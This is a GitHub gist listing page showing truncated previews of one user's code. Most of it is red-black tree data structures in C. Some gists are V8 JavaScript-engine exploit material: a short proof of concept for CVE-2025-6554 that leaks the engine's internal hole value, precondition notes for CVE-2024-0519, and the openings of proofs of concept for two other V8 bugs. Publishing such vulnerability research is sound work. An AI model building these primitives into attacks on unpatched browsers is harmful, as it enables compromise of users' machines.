Skip to content

Instantly share code, notes, and snippets.

View mistymntncop's full-sized avatar

mistymntncop

252 followers · 25 following
View GitHub Profile
@mistymntncop
mistymntncop / zipper.c
Last active July 13, 2025 06:57
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <stdbool.h>
#include <malloc.h>
#include <assert.h>
//Partially Persistent Red-Black Tree
//Implemented using Zippers
//https://ccs.neu.edu/~camoy/pub/red-black-tree.pdf
@mistymntncop
mistymntncop / rbtree.c
Last active July 12, 2025 11:06
#include <stdint.h>
#include <stdio.h>
#include <stdbool.h>
#include <malloc.h>
#include <string.h>
//Imperative implementation of "Faster, Simpler Red-Black Trees" by Cameron Moy
//https://ccs.neu.edu/~camoy/pub/red-black-tree.pdf
//https://github.com/zarif98sjs/RedBlackTree-An-Intuitive-Approach
@mistymntncop
mistymntncop / CVE-2025-6554 POC.js
Last active July 11, 2025 14:19
function leak_hole() {
let x;
delete x?.[y]?.a;
return y;
let y;
}
function pwn() {
let hole = leak_hole();
%DebugPrint(hole);
}
@mistymntncop
mistymntncop / zipper.c
Last active July 6, 2025 09:51
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <stdbool.h>
#include <malloc.h>
#include <assert.h>
//https://sedgewick.io/wp-content/themes/sedgewick/papers/2008LLRB.pdf
//Partially Persistent Left-leaning Red-Black Tree
@mistymntncop
mistymntncop / zipper_per.c
Last active May 16, 2025 06:11
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <stdbool.h>
#include <malloc.h>
#include <assert.h>
//Just pedagogical. No proper memory managagement here, would use Arenas in practice
#define NODE_CHILD_COUNT 2
@mistymntncop
mistymntncop / zipper.c
Last active July 8, 2025 02:06
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <stdbool.h>
#include <malloc.h>
#include <assert.h>
//Partially Persistent Left-Leaning Red-Black Tree
//Implemented using Zippers
//https://sedgewick.io/wp-content/themes/sedgewick/papers/2008LLRB.pdf
@mistymntncop
mistymntncop / CVE-2024-0519 notes
Created January 14, 2025 06:26
//Preconditons
//----------------------
// (1) The receiver must be a regular object and the key a unique name.
// this excludes special objects such as globalThis, wasm object, etc
// (2) The property to be deleted must be the last property.
// (3) The property to be deleted must be deletable.
// this excludes non-configurable properties. So no frozen or sealed objects.
// (4) The map must have a back pointer.
// this excludes prototype maps
// (5) The last transition must have been caused by adding a property
@mistymntncop
mistymntncop / 339736513.js
Last active June 4, 2024 12:09
d8.file.execute("wasm-module-builder.js");
let builder = new WasmModuleBuilder();
let array_type = builder.addArray(kWasmI32, true);
builder.addFunction('create_array', makeSig([kWasmI32], [wasmRefType(array_type)]))
.addBody([
kExprLocalGet, 0,
kGCPrefix, kExprArrayNewDefault, array_type,
])
@mistymntncop
mistymntncop / CVE-2024-4761.js
Last active May 6, 2025 03:44
// Build d8 using:
// a) Run once
// git checkout 6f98fbe86a0d11e6c902e2ee50f609db046daf71
// gclient sync
// gn gen ./out/x64.debug
// gn gen ./out/x64.release
//
// b)
// Debug Build:
// ninja -C ./out/x64.debug d8
@mistymntncop
mistymntncop / demo.c
Last active April 17, 2024 16:09
NtWaitForDebugEvent + WaitForMultipleObjects
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <stdbool.h>
#include <windows.h>
#include "nt_crap.h"
#define ArrayCount(arr) (sizeof(arr)/sizeof(arr[0]))
#define assert(expr) if(!(expr)) { *(char*)0 = 0; }